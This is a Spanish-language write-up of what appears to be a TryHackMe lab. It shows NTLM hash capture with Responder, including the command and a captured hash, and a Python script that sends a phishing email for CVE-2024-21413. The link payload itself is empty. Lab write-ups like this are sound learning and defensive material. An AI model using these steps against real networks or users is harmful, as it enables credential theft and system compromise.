
Demuestra la captura de hashes NTLM a través de Responder y la ejecución de correos electrónicos de phishing que explotan CVE-2024-21413 para comprometer sistemas.
Objetivo del Proyecto: El proyecto fue creado para demostrar el uso de varias herramientas para capturar hashes NTLM de usuarios en una red y para ejecutar ataques de phishing mediante correo electrónico. Esto muestra cómo se pueden explotar las vulnerabilidades de autenticación de red y los métodos de phishing para comprometer sistemas.
Descripción del Proceso
Ejecuté el siguiente comando para iniciar Responder:
root@ip-10-10-192-145:~# sudo responder -I ens5
Configuré Responder para que escuchara en la interfaz ens5. Inmediatamente comenzó a interceptar solicitudes de autenticación, permitiéndome ver hashes NTLM de usuarios en la red, como THM-MONIKERLINK\tryhackme y WORKGROUP\Administrator. Así es como se veía la salida al capturar los hashes:
[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB
Estos hashes pueden luego usarse para ataques como fuerza bruta o ataques de hash.
El enlace de phishing en el correo se veía así:
Aquí está el script completo de Python utilizado para enviar el correo de phishing:import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr
sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")
html_content = """\
"""message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email
msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)
server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()
try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)
try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()
Este script envía un correo con un enlace malicioso, que podría explotar potencialmente la vulnerabilidad CVE-2024-21413.
Resultados Como resultado, pude demostrar dos aspectos clave:
Capturar hashes NTLM usando la herramienta Responder, que es un paso crucial para atacar la autenticación de red.
Phishing y explotación de vulnerabilidades a través de correo electrónico usando el script de Python. El envío de correos de phishing con enlaces maliciosos puede engañar a los usuarios y llevar al compromiso del sistema.
Este proyecto mostró cómo las vulnerabilidades de red y los ataques de phishing pueden ser explotados para obtener acceso a sistemas. También destacó la importancia de defenderse contra tales ataques mediante métodos de autenticación sólidos y filtrado de tráfico de correo electrónico.